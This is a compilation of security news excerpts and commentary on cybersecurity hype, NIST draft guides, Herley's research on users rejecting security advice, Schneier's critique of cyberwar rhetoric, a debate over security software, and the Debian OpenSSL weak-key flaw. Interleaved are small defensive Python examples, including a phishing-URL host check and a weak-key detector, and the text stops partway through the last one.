Cybersecurity is a big and booming industry. The U.S. government is expected to spend $10.5 billion a year on information security by 2015, and analysts have estimated the worldwide market to be as much as $140 billion a year. The Defense Department has said it is seeking more than $3.2 billion in cybersecurity funding for 2012. Lockheed Martin, Boeing, L-3 Communications, SAIC, and BAE Systems have all launched cybersecurity divisions in recent years. Other traditional defense contractors, such as Northrop Grumman, Raytheon, and ManTech International, have invested in information security products and services. We should be wary of proving Eisenhower right again in the cyber sphere.
Before enacting sweeping changes to counter cyber threats, policy makers should clear the air with some simple steps.
Stop the apocalyptic rhetoric. The alarmist scenarios dominating policy discourse may be good for the cybersecurity-industrial complex, but they aren’t doing real security any favors.
Declassify evidence relating to cyber threats. Overclassification is a widely acknowledged problem, and declassification would allow the public to verify the threats rather than blindly trusting self-interested officials.
Disentangle the disparate dangers that have been lumped together under the “cybersecurity” label. This must be done to determine who is best suited to address which threats. In cases of cybercrime and cyberespionage, for instance, private network owners may be best suited and have the best incentives to protect their own valuable data, information, and reputations.
UPDATE 2.14.12: Story was updated to correct the name of the worm that was supposed to have affected the Northeast power grid.
DRAFT Guide for Security Configuration Management of Information Systems
draft_sp800-128-ipd.pdf (850 KB)
March 2010 | NIST
NIST announces the publication of Initial Public Draft Special Publication 800-128, Guide for Security Configuration Management of Information Systems. The publication provides guidelines for managing the configuration of information system architectures and associated components for secure processing, storing, and transmitting of information. Security configuration management is an important function for establishing and maintaining secure information system configurations, and provides important support for managing organizational risks in information systems.
NIST SP 800-128 identifies the major phases of security configuration management and describes the process of applying security configuration management practices for information systems including: (i) planning security configuration management activities for the organization; (ii) planning security configuration management activities for the information system; (iii) configuring the information system to a secure state; (iv) maintaining the configuration of the information system in a secure state; and (v) monitoring the configuration of the information system to ensure that the configuration is not inadvertently altered from its approved state.
The security configuration management concepts and principles described in this publication provide supporting information for NIST SP 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations that include the Configuration Management family of security controls and other security controls that draw upon configuration management activities in implementing those controls. This publication also provides important supporting information for the Monitor Step (Step 6) of the Risk Management Framework that is discussed in NIST SP 800-37, Revision 1, Guide for Applying the Risk Management Framework to Federal Information Systems: A Security Life Cycle Approach.
NIST requests comments on the Initial Public Draft of Special Publication 800-128 by June 14, 2010. Please submit comments to [email protected].
[May 08, 2010] Are users right in rejecting security advice
TechRepublic.com
I now understand why my friend insisted I listen to Episode 229 of the Security Now series. He wanted to introduce me to Cormac Herley, Principal Researcher at Microsoft, and his paper, “So Long, and No Thanks for the Externalities: The Rational Rejection of Security Advice by Users.”
Dr. Herley introduced the paper this past September at the New Security Paradigms Workshop, a fitting venue. See if you agree after reading the group’s mandate:
“NSPW’s focus is on work that challenges the dominant approaches and perspectives in computer security. In the past, such challenges have taken the form of critiques of existing practice as well as novel, sometimes controversial, and often immature approaches to defending computer systems.
By providing a forum for important security research that isn’t suitable for mainstream security venues, NSPW aims to foster paradigm shifts in information security.”
Herley’s paper is of special interest to the group: not only does it meet NSPW’s tenet of being outside the mainstream, it forces a rethink of what’s important when it comes to computer security.
Radical thinking
To get an idea of what the paper is about, here’s a quote from the introduction:
“We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort. Looking at various examples of security advice we find that the advice is complex and growing, but the benefit is largely speculative or moot.”
A diagram in the paper (courtesy of Cormac Herley) shows what he considers direct and indirect costs. So, is Herley saying that heeding advice about computer security is not worth it? Let’s find out.
Who’s right
Researchers have different ideas as to why people fail to use security measures. Some feel that regardless of what happens, users will only do the minimum required. Others believe security tasks are rejected because users consider them to be a pain. A third group maintains user education is not working.
Herley offers a different viewpoint. He contends that user rejection of security advice is based entirely on the economics of the process. He offers the following as reasons why:
- Users understand that there is no assurance heeding advice will protect them from attacks.
- Users also know that each additional security measure adds cost.
- Users perceive attacks to be rare. Security advice, by contrast, is a constant burden, and thus costs more than an actual attack would.
To explain
As I read the paper, I sensed Herley was coaxing me to stop thinking like an IT professional and start thinking like a mainstream user. That way, I would understand the following:
- The sheer volume of advice is overwhelming. There is no way to keep up with it. Besides that, the advice is fluid. What’s right one day may not be the next. I agree; witness the US-CERT security bulletins for just the week of March 1, 2010.
- The typical user does not always see benefit from heeding security advice. I once again agree. Try explaining why a strong password is important to someone who had one stolen by a keylogger.
- The benefit of heeding security advice is speculative. I checked and could not find significant data on the number and severity of attacks users encounter, let alone data quantifying positive feedback from following security advice.
Cost versus benefit
I wasn’t making the connection between cost-benefit trade-offs and IT security. My son, an astute business-type, had to explain that costs and benefits do not always directly refer to financial gains or losses. After hearing that, things started making sense. One such cost analysis was described by Steve Gibson in the podcast.
Gibson simply asked: how often do you require passwords to be changed? I asked several system administrators what time frame they used; most responded once a month. Using Herley’s logic, that means an attacker potentially has a whole month to use the password.
So, is the cost of having users struggle with a new password every month beneficial? Before you answer, you may also want to think about bad practices users implement because of the frequent-change policy:
- By the time a user is comfortable with a password, it’s time to change. So, users opt to write passwords down. That’s another whole debate; ask Bruce Schneier.
- Users know how many passwords the system remembers and cycle through that amount, which allows them to keep using the same one.
Is anything truly gained by having passwords changed often? The only benefit I see is if the attacker does not use the password within the password-refresh time limit. What’s your opinion? Is changing passwords monthly, a benefit or a cost?
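To make Gibson's question concrete, here is a back-of-the-envelope model in Python; all the numbers are illustrative assumptions, not measurements from Herley's paper:

```python
# Back-of-the-envelope model of Gibson's question. All numbers are
# illustrative assumptions, not measurements from Herley's paper.

def attacker_window_days(rotation_period_days):
    """If a password is stolen at a uniformly random moment in a
    rotation period, the attacker keeps it, on average, for half of
    the remaining period before the forced change."""
    return rotation_period_days / 2

def user_cost_hours_per_year(rotation_period_days, minutes_per_change=5.0):
    """Time one user spends per year choosing, memorizing, and
    mistyping new passwords under the policy."""
    changes_per_year = 365 / rotation_period_days
    return changes_per_year * minutes_per_change / 60

for period in (30, 90, 365):
    print(f"rotate every {period:>3} days: "
          f"attacker window ~{attacker_window_days(period):5.1f} days, "
          f"user cost ~{user_cost_hours_per_year(period):4.1f} h/year")
```

The shorter the rotation period, the smaller the attacker's average window, but the user cost grows in direct proportion; Herley's argument is that at realistic victimization rates the trade is a bad one.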
Dr. Herley does an in-depth cost-benefit analysis in three specific areas, password rules, phishing URLs, and SSL certificate errors. I would like to spend some time with each.
Password rules
Password rules place the entire burden on the user. So, users understand the cost of having to abide by the following rules:
- Length
- Composition (e.g. digits, special characters)
- Non-dictionary words (in any language).
- Don’t write it down
- Don’t share it with anyone
- Change it often
- Don’t re-use passwords across sites
The report proceeds to explain how each rule is not really helpful. For example, the first three rules are not that important, as most applications and Web sites have a lockout rule that restricts access after so many failed tries. I already touched on why “Change it often” is not considered helpful.
All said and done, users know that strictly observing the above rules is no guarantee of being safe from exploits. That makes it difficult for them to justify the additional effort and associated cost.
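The lockout argument is easy to quantify. Here is a small sketch, with assumed policy numbers, of how few online guesses a lockout rule actually leaves an attacker, which is why length and composition rules add little against online attacks:

```python
# How many online guesses does a lockout rule actually permit?
# Policy numbers are assumptions for illustration.
attempts_before_lockout = 5     # failed tries allowed per window
lockout_minutes = 15            # account stays locked this long

windows_per_day = 24 * 60 / lockout_minutes
guesses_per_year = attempts_before_lockout * windows_per_day * 365

# Even a modest all-lowercase 8-character password space:
keyspace = 26 ** 8

print(f"online guesses per year: {guesses_per_year:,.0f}")      # 175,200
print(f"fraction of keyspace tried in a year: "
      f"{guesses_per_year / keyspace:.1e}")                     # ~8.4e-07
```

(Offline attacks against a stolen password database are a different matter; the lockout logic applies only to online guessing.)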
Phishing URLs
Trying to explain URL spoofing to users is complicated. Besides, by the time you get through half of all possible iterations, most users are not listening. For example, a slide from Herley’s paper (courtesy of Cormac Herley) lists some spoofed URLs for PayPal.
To reduce cost to users, Herley wants to turn this around. He explains that users need to know when the URL is good, not bad:
“The main difficulty in teaching users to read URLs is that in certain cases this allows users to know when something is bad, but it never gives a guarantee that something is good. Thus the advice cannot be exhaustive and is full of exceptions.”
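The asymmetry Herley describes (spotting bad URLs is open-ended, while verifying a known-good host is checkable) can be seen in a few lines of code. A sketch, with illustrative domain names; production code should use a library such as tldextract, since "registered domain" rules are messier than this:

```python
# Why spoofed URLs work: users (and naive checks) look for the brand
# name anywhere in the URL, while what matters is the host's
# registered domain. Domain names below are illustrative.
from urllib.parse import urlparse

def hostname(url):
    return (urlparse(url).hostname or "").lower()

def naive_check(url):
    # The flawed heuristic many users apply: "it says paypal.com".
    return "paypal.com" in url

def stricter_check(url):
    # Accept only the exact host or a subdomain of it.
    host = hostname(url)
    return host == "paypal.com" or host.endswith(".paypal.com")

for url in ("https://www.paypal.com/signin",
            "https://paypal.com.example.net/signin",   # spoof
            "http://example.net/paypal.com/login"):    # spoof
    print(f"{url}\n  naive: {naive_check(url)}  stricter: {stricter_check(url)}")
```

The stricter check is exactly the "know when it is good" rule Herley advocates; the naive check is the open-ended "know when it is bad" rule that can never be exhaustive.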
Certificate errors
For the most part, people understand SSL, the significance of https, and are willing to put up with the additional burden to keep their personal and financial information safe. Certificate errors are a different matter. Users do not understand their significance and for the most part ignore them.
I’m as guilty as the next when it comes to certificate warnings. I feel like I’m taking a chance, yet what other options are available? After reading the report, I am not as concerned. Why? Statistics show that virtually all certificate errors are false positives.
The report also reflects the irony of thinking that ignored certificate warnings will lead to problems. Typically, bad guys do not use SSL on their phishing sites and if they do, they are going to make sure their certificates work, not wanting to bring any undue attention to their exploit. Herley states it this way:
“Even if 100% of certificate errors are false positives it does not mean that we can dispense with certificates. However, it does mean that for users the idea that certificate errors are a useful tool in protecting them from harm is entirely abstract and not evidence-based. The effort we ask of them is real, while the harm we warn them of is theoretical.”
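For readers curious what a certificate "error" actually is at the protocol level, here is a minimal Python sketch; the hostname is a placeholder, and the exception caught below is the condition browsers surface as a warning dialog:

```python
# What a certificate "error" is at the protocol level: the peer's
# chain fails validation against trusted roots, or the name doesn't
# match. Sketch only; the hostname is a placeholder.
import socket
import ssl

def check_tls(host, port=443):
    context = ssl.create_default_context()   # verifies chain + hostname
    try:
        with socket.create_connection((host, port), timeout=5) as sock:
            with context.wrap_socket(sock, server_hostname=host) as tls:
                print(f"{host}: certificate OK, {tls.version()}")
    except ssl.SSLCertVerificationError as err:
        # The condition browsers surface as a certificate warning.
        print(f"{host}: certificate error: {err.verify_message}")

check_tls("www.example.com")
```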
Outside the box
There you have it. Is that radical-enough thinking for you? It is for me. That said, Dr. Herley offers the following advice:
“We do not wish to give the impression that all security advice is counter-productive. In fact, we believe our conclusions are encouraging rather than discouraging. We have argued that the cost-benefit trade off for most security advice is simply unfavorable: users are offered too little benefit for too much cost.
Better advice might produce a different outcome. This is better than the alternative hypothesis that users are irrational. This suggests that security advice that has compelling cost-benefit trade off has real chance of user adoption. However, the costs and benefits have to be those the user cares about, not those we think the user ought to care about. “
Herley offers the following advice to help us get out of this mess:
- We need an estimate of the victimization rate for any exploit when designing appropriate security advice. Without this we end up doing worst-case risk analysis.
- User education is a cost borne by the whole population, while offering benefit only to the fraction that fall victim. Thus the cost of any security advice should be in proportion to the victimization rate.
- Retiring advice that is no longer compelling is necessary. Many of the instructions with which we burden users do little to address the current harms that they face.
- We must prioritize advice. In trying to defend everything we end up defending nothing. When we provide long lists of unordered advice we abdicate all opportunity to have influence and abandon users to fend for themselves.
- We must respect users’ time and effort. Viewing the user’s time as worth $2.6 billion an hour is a better starting point than valuing it at zero; a rough reconstruction of that figure follows below.
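Where does a number like $2.6 billion an hour come from? A minimal back-of-the-envelope sketch; the population and wage inputs are assumptions consistent with Herley's framing (the US online population's time valued at twice the minimum wage), not figures quoted in this article:

```python
# Rough reconstruction of the "$2.6 billion an hour" valuation.
# Inputs are assumptions: ~180 million US online adults, time valued
# at twice the 2009 federal minimum wage of $7.25/hour.
online_adults = 180_000_000
hourly_value = 2 * 7.25        # $14.50 per person-hour

total = online_adults * hourly_value
print(f"${total / 1e9:.1f} billion per hour")   # -> $2.6 billion per hour
```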
Final thoughts
The big picture idea I am taking away from Dr. Herley’s paper is that users have never actually been offered security. All the advice, policies, directives, and whatnot offered in the name of IT security promise only reduced risk. Could changing that be the paradigm shift needed to get information security on track?
I want to thank Dr. Cormac Herley for his thought-provoking paper and e-mail conversation.
[Apr 21, 2009] SP 800-118 DRAFT Guide to Enterprise Password Management
Apr. 21, 2009 | NIST
NIST announces that Draft Special Publication (SP) 800-118, Guide to Enterprise Password Management, has been released for public comment. SP 800-118 is intended to help organizations understand and mitigate common threats against their character-based passwords. The guide focuses on topics such as defining password policy requirements and selecting centralized and local password management solutions.
NIST requests comments on draft SP 800-118 by May 29, 2009. Please submit comments to [email protected] with "Comments SP 800-118" in the subject line.
draft-sp800-118.pdf (181 KB)
Threat of 'cyberwar' has been hugely hyped - CNN.com by Bruce Schneier.
Editor's note: Bruce Schneier is a security technologist and author of "Beyond Fear: Thinking Sensibly About Security in an Uncertain World." Read more of his writing at http://www.schneier.com/
(CNN) -- There's a power struggle going on in the U.S. government right now.
It's about who is in charge of cyber security, and how much control the government will exert over civilian networks. And by beating the drums of war, the military is coming out on top.
"The United States is fighting a cyberwar today, and we are losing," said former NSA director -- and current cyberwar contractor -- Mike McConnell. "Cyber 9/11 has happened over the last ten years, but it happened slowly so we don't see it," said former National Cyber Security Division director Amit Yoran. Richard Clarke, whom Yoran replaced, wrote an entire book hyping the threat of cyberwar.
General Keith Alexander, the current commander of the U.S. Cyber Command, hypes it every chance he gets. This isn't just rhetoric of a few over-eager government officials and headline writers; the entire national debate on cyberwar is plagued with exaggerations and hyperbole.
Googling those names and terms -- as well as "cyber Pearl Harbor," "cyber Katrina," and even "cyber Armageddon" -- gives some idea how pervasive these memes are. Prefix "cyber" to something scary, and you end up with something really scary.
Cyberspace has all sorts of threats, day in and day out. Cybercrime is by far the largest: fraud, through identity theft and other means, extortion, and so on. Cyber-espionage is another, both government- and corporate-sponsored. Traditional hacking, without a profit motive, is still a threat. So is cyber-activism: people, most often kids, playing politics by attacking government and corporate websites and networks.
These threats cover a wide variety of perpetrators, motivations, tactics, and goals. You can see this variety in what the media has mislabeled as "cyberwar." The attacks against Estonian websites in 2007 were simple hacking attacks by ethnic Russians angry at anti-Russian policies; these were denial-of-service attacks, a normal risk in cyberspace and hardly unprecedented.
A real-world comparison might be if an army invaded a country, then all got in line in front of people at the DMV so they couldn't renew their licenses. If that's what war looks like in the 21st century, we have little to fear.
Similar attacks against Georgia, which accompanied an actual Russian invasion, were also probably the responsibility of citizen activists or organized crime. A series of power blackouts in Brazil was caused by criminal extortionists -- or was it sooty insulators? China is engaging in espionage, not war, in cyberspace. And so on.
One problem is that there's no clear definition of "cyberwar." What does it look like? How does it start? When is it over? Even cybersecurity experts don't know the answers to these questions, and it's dangerous to broadly apply the term "war" unless we know a war is going on.
Yet recent news articles have claimed that China declared cyberwar on Google, that Germany attacked China, and that a group of young hackers declared cyberwar on Australia. (Yes, cyberwar is so easy that even kids can do it.) Clearly we're not talking about real war here, but a rhetorical war: like the war on terror.
We have a variety of institutions that can defend us when attacked: the police, the military, the Department of Homeland Security, various commercial products and services, and our own personal or corporate lawyers. The legal framework for any particular attack depends on two things: the attacker and the motive. Those are precisely the two things you don't know when you're being attacked on the Internet. We saw this on July 4 last year, when U.S. and South Korean websites were attacked by unknown perpetrators from North Korea -- or perhaps England. Or was it Florida?
We surely need to improve our cybersecurity. But words have meaning, and metaphors matter. There's a power struggle going on for control of our nation's cybersecurity strategy, and the NSA and DoD are winning. If we frame the debate in terms of war, if we accept the military's expansive cyberspace definition of "war," we feed our fears.
We reinforce the notion that we're helpless -- what person or organization can defend itself in a war? -- and others need to protect us. We invite the military to take over security, and to ignore the limits on power that often get jettisoned during wartime.
If, on the other hand, we use the more measured language of cybercrime, we change the debate. Crime fighting requires both resolve and resources, but it's done within the context of normal life. We willingly give our police extraordinary powers of investigation and arrest, but we temper these powers with a judicial system and legal protections for citizens.
We need to be prepared for war, and a Cyber Command is just as vital as an Army or a Strategic Air Command. And because kid hackers and cyber-warriors use the same tactics, the defenses we build against crime and espionage will also protect us from more concerted attacks. But we're not fighting a cyberwar now, and the risks of a cyberwar are no greater than the risks of a ground invasion. We need peacetime cyber-security, administered within the myriad structure of public and private security institutions we already have.
The opinions expressed in this commentary are solely those of Bruce Schneier.
[Apr 14, 2009] Security Software: Protection or Extortion? by Rick Broida and Robert Vamosi
April 13, 2009 | PC World
As the Conficker worm sprang to life on April 1, talk here at the PC World offices turned to some interesting debates about how best to protect PCs from malware threats. In recent weeks we've run several helpful articles offering tips, tricks, and insights to keep you and your PC safe from Conficker and other malware on the Internet. At the same time, a few among us have revealed that they don't run any security software at all on their own machines--and have no intention of starting now.
Shocking as it may sound, there are plenty of experienced, knowledgeable technophiles out there who laugh in the face of danger as they traipse unprotected through the wilds of the online world. Among them is our own Hassle-Free PC blogger Rick Broida, who prefers what he deems the relatively minor threat of malware to the annoyance of intrusive, nagging security apps.
Is he insane? Naïve? To find out, we gave Rick a podium to speak on behalf of those who shrug off the safety of antimalware suites, and to defend his point of view in a debate with security correspondent Robert Vamosi, who regularly reports on malware and other security threats for PC World's Business Center. Who's right? Who's nuts? You be the judge. Share your view in our comments section.
First up, Rick Broida presents his assertion that security suites are an unnecessary nuisance compared with the threat of malware.
Rick Broida: We Don't Need No Stinking Security Software
Security software is a scam. A rip-off. A waste of money, a pain in the neck, and a surefire way to bring even the speediest PC to a crawl. Half the time it seems to cause more problems than it solves. Oh, and one more thing: It's unnecessary.
Heresy? Crazy talk? Recipe for disaster? No, no, and no. For the past several years, I've run Windows (first XP, and now Vista) without a single byte of third-party security software. No ZoneAlarm. No Norton Internet Security. No Spyware Doctor. Not even freebie favorite Avast Home Edition. I use nothing but the tools built into Windows and a few tricks I've learned.
Want to know how much time I've spent cleaning up after viruses, spyware, rootkits, Trojan horses, keyloggers, and other security breaches? None. I'll say that again: none.
Maybe I'm asking for trouble (that sound you hear is fellow PC World columnist Rob Vamosi nodding furiously), but after years of infection-free computing, I have no qualms about my methods. Your mileage may vary, and I make no guarantees. But if you want to rid your system of pricey, performance-choking security software, read on.
My first line of defense is my router. Like most, it has a built-in firewall that blocks all unauthorized traffic and makes my network more or less invisible to the outside world. The second line of defense is Windows. XP, Vista, and 7 have built-in firewalls that help protect against "inside" attacks, such as if a friend were to come over with his spyware-infected laptop and connect to my network.
Of course, a router can't stop viruses, phishing, and other threats that arrive via e-mail. My secret weapon: Gmail. As I noted in "Use Gmail to Fight Spam," I route mail from my personal domain to my Gmail account. (From there, I can access messages on the Web or pull them down via Outlook.) Gmail does a phenomenal job filtering spam--much of which is malware. The service also performs a virus scan on all attachments.
By using Gmail as an intermediary between my POP3 server and my PC, I've kept not only spam at bay, but malware as well. I don't know whether Windows Live Mail and Yahoo Mail offer similar amenities, but for me Gmail is a slam-dunk solution. Even phishing messages are few and far between. Of course, as an educated user, I know better than to click a link in a message filled with scary come-ons ("Your account has been compromised!").
Speaking of phishing, the latest versions of Firefox and Internet Explorer offer robust antiphishing tools. Both will sound the alarm if I attempt to visit sites known to be fraudulent, meaning that even if I click something that looks like, say, a totally legit PayPal or eBay link, I'll get fair warning. And that's just the tip of the safe-browser iceberg: Firefox and IE are way more secure than in the old days. They block pop-ups, provide Web site ID checks, protect against malware installation, and so on.
As for other threats, I'm comfortable leaving my PC in the capable hands of Windows Defender. Microsoft's antispyware tool runs quietly and efficiently in the background. I "check in" once in a while to make sure it's active and up-to-date, but otherwise I never hear a peep from it.
Of course, that could mean bad stuff is slipping past Defender, right? Sure, it's possible. That's why I occasionally run a system scan using Ad-Aware or Malwarebytes Anti-Malware. (I'm not completely insane, after all.) So far, so good: The scans always come up empty.
Last but not least, I exercise common sense. I don't open e-mail attachments from people I don't know. I don't download files from disreputable or unknown sources. I don't visit Web sites that peddle gambling, porn, torrents, or "warez." (Yeah, I know, I'm boring.) In other words, I keep my Internet nose clean, which in turn keeps my PC clean.
At the same time, I make sure that automatic updates are turned on for Windows, my Web browsers, and any other software that gets patched regularly. And, perhaps most important of all, I rely on multiple backup methods just in case my system really is compromised somehow. For example, my Firefox bookmarks are all synced to the Web via Xmarks (formerly Foxmarks). I use the online-backup service Mozy to archive my critical documents and Outlook PST file. And drive-cloning utility Casper makes a weekly copy of my entire hard drive to a second drive.
Ladies and gentlemen of the security-software jury, I rest my case. My only real evidence is Exhibit A: me. After several years with XP and about six months with Vista, I'm still cruising along without a security care in the world. So, are you going to lock me up or accept me as your new messiah? Either way, I'm good.
Next up, security correspondent Robert Vamosi argues the opposing view.
[Feb 27, 2009] NIST Computer Security Division released two draft publications (a Special Publication and a NIST Interagency Report) and one mark-up copy of a draft SP:
1. Mark-up copy of Draft Special Publication (SP) 800-53 Revision 3
2. Draft Special Publication 800-81 Revision 1
3. Draft NIST Interagency Report (IR) 7517
1. Draft SP 800-53 Rev. 3: Recommended Security Controls for Federal Information Systems and Organizations
The following document provides a line-by-line (mark-up copy) comparison between SP 800-53, Revision 2 and Draft SP 800-53, Revision 3. It should also be noted that the section of the publication addressing scoping considerations for scalability was inadvertently omitted from the public draft and will be reinstated in the final publication.
URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-53_Rev3
******
2. Draft SP 800-81 Rev. 1: Secure Domain Name System (DNS) Deployment Guide
NIST has drafted a new version of the document "Secure Domain Name System (DNS) Deployment Guide (SP 800-81)". This document, after a review and comment cycle, will be published as NIST SP 800-81r1. There will be two rounds of public comments, and this is the posting for the first one. Federal agencies and private organizations as well as individuals are invited to review the draft Guidelines and submit comments to NIST by sending them to [email protected] before March 31, 2009. Comments will be reviewed and posted on the CSRC website.
All comments will be analyzed, consolidated, and used in revising the draft Guidelines before final publication.
Reviewers of the draft revised Guidelines should note the following differences and additions:
(1) Updated Recommendations for all cryptographic operations relating to digital signing of DNS records, verification of the signatures, Zone Transfer, Dynamic Updates, key Management and Authenticated Denial of Existence.
(2) The additional IETF RFC documents that have formed the basis for the updated recommendations include: DNSSEC Operational Practices (RFC 4641), Automated Updates for DNS Security (DNSSEC) Trust Anchors (RFC 5011), DNS Security (DNSSEC) Hashed Authenticated Denial of Existence (RFC 5155), and HMAC SHA TSIG Algorithm Identifiers (RFC 4635).
(3) The FIPS standards and NIST guidelines incorporated into the updated recommendations include: The Keyed-Hash Message Authentication Code (HMAC) (FIPS 198-1), Digital Signature Standard (FIPS 186-3) and Recommendations for Key Management (SP 800-57P1 & SP 800-57P3).
(4) Illustration of secure configuration examples using the NSD DNS software offering, in addition to BIND.
URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-81-rev1
[Feb 17, 2009] SP 800-53, Revision 3 DRAFT Recommended Security Controls for Federal Information Systems and Organizations
NIST announces the release of the Initial Public Draft (IPD) of Special Publication 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations. This is the first major update of Special Publication 800-53 since its initial publication in December 2005. We have received excellent feedback from our customers during the past three years and have taken this opportunity to provide significant improvements to the security control catalog. In addition, the changing threat environment and growing sophistication of cyber attacks necessitated specific changes to the allocation of security controls and control enhancements in the low-impact, moderate-impact, and high-impact baselines. We also continue to work closely with the Department of Defense and the Office of the Director of National Intelligence under the auspices of the Committee on National Security Systems on the harmonization of security control specifications across the federal government. And lastly, we have added new security controls to address organization-wide security programs and introduced the concept of a security program plan to capture security program management requirements for organizations. The privacy-related material, originally scheduled to be included in Special Publication 800-53, Revision 3, will undergo a separate public review process in the near future and be incorporated into this publication, when completed. Comments will be accepted until March 27, 2009. Comments should be forwarded via email to [email protected].
Draft-SP800-53 Rev.3.pdf (2,112 KB)
Cisco study: IT security policies unfair - Network World, by Jim Duffy
A better term for "unfair security policy" would be "bureaucratic perversion". The level of detachment from reality is the crucial variable and can range from "no clue" to "parallel universe". But the key requirement is to "not do any harm". That's why extremely unfair security policies are often called administrative fascism.
Unfair policies prompt most employees to break company IT security rules, and that could lead to lost customer data, a Cisco study found.
Cisco this week released a second set of findings from a global study on data leakage. The first part dealt with common employee data leakage risks and the potential impact on the collaborative workforce.
Part two deals with the ‘whys’ of behavior that raises the risk of corporate data leakage. More than half of the employees surveyed admitted that they do not always adhere to corporate security policies.
And when they don’t, it can lead to leakage of sensitive data. Of the IT respondents who dealt with employee policy violations, one in five reported that incidents resulted in lost customer data, according to the Cisco study.
The surveys were conducted of more than 2,000 employees and IT professionals in 10 countries: the United States, the United Kingdom, France, Germany, Italy, Japan, China, India, Australia and Brazil. They were executed by InsightExpress, a U.S.-based market research firm, and commissioned by Cisco.
The study found that the majority of employees believe their companies’ IT security policies are unfair. Indeed, surveyed employees said the top reason for non-compliance is the belief that policies do not align with the reality of what they need to do their jobs, according to Cisco.
The study found that the majority of employees in eight of 10 countries felt their company’s policies were unfair. Only employees in Germany and the United States did not agree.
In Germany, even though the majority of employees felt their companies’ policies were fair, more than half of them said they would break rules to complete their jobs, the study found. Of all the countries, France (84%) has the most employees who admitted defying policies, whether rarely or routinely.
In India, one in 10 employees admitted never or hardly ever abiding by corporate security policies. Overall, the study found that 77% of companies had security policies in place.
But defiance may not be intentional. IT and employees have a disconnect when it comes to policy and adherence awareness, the study found.
IT believes employees defy policies for a variety of reasons, from failing to grasp the magnitude of security risks to apathy; employees say they break them because they do not align with the ability to do their jobs.
But IT could do a better job communicating those policies. The study found that, depending on the country, the number of IT professionals who knew a policy existed was 20% to 30% higher than the number of employees.
Torvalds: Fed up with the security circus By Ellen Messmer
"A lot of activity [in various security camps] stems from public-relations posturing." "What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.
Creator of the Linux kernel explains why he finds security people to be so anathema. 08/14/2008, Network World
Linus Torvalds, creator of the Linux kernel, says he's fed up with what he sees as a "security circus" surrounding software vulnerabilities and how they're hyped by security people. Torvalds explained his position in an e-mail exchange with Network World this week. He also expanded on critical comments he made last month that caused a stir in the IT industry.
Last month Torvalds stated in an online posting that "one reason I refuse to bother with the whole security circus is that I think it glorifies -- and thus encourages -- the wrong behavior. It makes 'heroes' out of security people, as if the people who don't just fix normal bugs aren't as important. In fact, all the boring normal bugs are way more important, just because there's a lot more of them."
Never one to mince words, Torvalds also lobbed a verbal charge at the OpenBSD community: "I think the OpenBSD crowd is a bunch of masturbating monkeys, in that they make such a big deal about concentrating on security to the point where they pretty much admit that nothing else matters to them."
This week Torvalds -- who says the only person involved in the OpenBSD community with whom he talked to about the "monkeys" barb found it funny -- acknowledges others probably found it offensive.
Via e-mail, he also explains why he finds security people to be so anathema.
Too often, so-called "security" is split into two camps: one that believes in nondisclosure of problems by hiding knowledge until a bug is fixed, and one that "revels in exposing vendor security holes because they see that as just another proof that the vendors are corrupt and crap, which admittedly mostly are," Torvalds states.
Torvalds went on to say he views both camps as "crazy."
"Both camps are whoring themselves out for their own reasons, and both camps point fingers at each other as a way to cement their own reason for existence," Torvalds asserts. He says a lot of activity in both camps stems from public-relations posturing.
He says neither camp is absolutely right in any event, and that a middle course, based on fixing things as early as possible without a lot of hype, is preferable.
"You need to fix things early, and that requires a certain level of disclosure for the developers," Torvalds states, adding, "You also don't need to make a big production out of it."
Torvalds also says he doesn't care for labeling updates and changes to Linux as a security fix in a security advisory.
"What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.
It's better to avoid sticking solely to either "full and immediate disclosure" or ignoring bugs that might embarrass vendors, he points out. "Any situation that allows the vendor to sit on the bug for weeks or months is unacceptable, as is any situation that makes it harder for people who find problems to talk to technical people."
Torvalds says he's skeptical about the value of synchronized releases among vendors that favor the idea of an embargo of software vulnerability information until a fix from a vendor is ready.
That process discourages thinking about design changes to make it harder to have security bugs, Torvalds says. "So, the whole 'embargoes are good' mentality is just corruption from the vendors," he states. "But on the other hand, disclosure should not be the goal."
"I don’t believe in either camp," Torvalds concludes. What he does favor is to "have a model where security is easier to do in the first place -- that is, the Unix model -- but make it easy for people to report bugs with no embargo, but privately."
He says the Linux kernel security list "is private" in the sense that "we don't need to leak things out further" to get some software issue fixed. He says the process allows, though doesn't encourage, a five-day embargo, and "even then, I will forward it to technical people on an 'as needed' basis, because even that embargo secrecy is not some insane absolute thing."
Comments
Some people... By Anonymous on August 17, 2008, 2:31 pm
I can't believe the genius behind Linux referred to proactively fixing all bugs, regardless of security implications as "masturbating", since that's quite obviously...
[May 16, 2008] Linux gets security black eye
May 16, 2008
As has been widely reported, the maintainers of Debian's OpenSSL packages made some errors recently that have potentially compromised the security of any sshd-equipped system used remotely by Debian users. System administrators may wish to purge authorized_key files of public keys generated since 2006 by affected client machines.
Simply using a Debian-based machine to access a remote server via SSH would not be enough to put the machine at risk. However, if the user copied a public key generated on a Debian-based system to the remote server, for example to take advantage of the higher security offered by password-free logins, then the weak key could make the server susceptible to brute-force attacks, especially if the user's name is easily guessable.
Administrators of servers that run SSH may wish to go through users' authorized key files (typically ~/.ssh/authorized_keys), deleting any that may have been affected. A "detector" script, available here, appears to compare public key signatures against a list of just 262,800 entries. That in turn suggests that if the user's name is known, a brute force attack progressing at one guess per second could succeed within 73 hours (262,800 seconds).
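Conceptually the detector's job is simple: fingerprint every public key and test membership in a set of known-weak fingerprints. Here is a sketch of the idea in Python; the blocklist file name and its format (one hex MD5 fingerprint per line) are assumptions, and in practice the real ssh-vulnkey tool mentioned below should be used instead:

```python
# Sketch of what such a detector does: fingerprint every key in an
# authorized_keys file and test membership in a set of known-weak
# fingerprints. File names and the blocklist format (one hex MD5
# fingerprint per line) are assumptions; use the real ssh-vulnkey
# tool in practice. Assumes plain "type blob [comment]" key lines.
import base64
import hashlib

def fingerprint(line):
    parts = line.split()
    if len(parts) < 2 or parts[0].startswith("#"):
        return None
    try:
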